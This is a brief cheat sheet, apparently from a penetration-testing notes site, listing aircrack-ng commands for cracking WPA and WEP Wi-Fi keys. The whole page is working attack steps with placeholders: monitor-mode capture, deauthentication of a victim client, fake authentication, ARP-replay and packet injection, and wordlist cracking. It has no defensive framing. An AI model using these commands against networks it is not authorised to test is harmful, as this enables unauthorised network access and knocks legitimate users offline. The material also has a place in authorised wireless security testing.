Aircrack-ng

#CRACKING WPA

airmon-ng start wlan0
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) wlan0mon
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) wlan0mon {disassociation attack}
aircrack-ng -0 -w (wordlist path) (capture filename)

#CRACKING WEP WITH CONNECTED CLIENTS

airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) wlan0mon
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) wlan0mon {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) wlan0mon {disassociation attack}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) wlan0mon {ARP replay attack}

#CRACKING WEP VIA A CLIENT

airmon-ng start wlan0 (channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) wlan0mon
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) wlan0mon {fake authentication}
aireplay-ng -2 -b (AP MAC) -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0mon
aireplay-ng -2 -r (replay cap file) wlan0mon {inject using cap file}
aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap
PreviousWireshark NextTCPDump
Last updated 2 years ago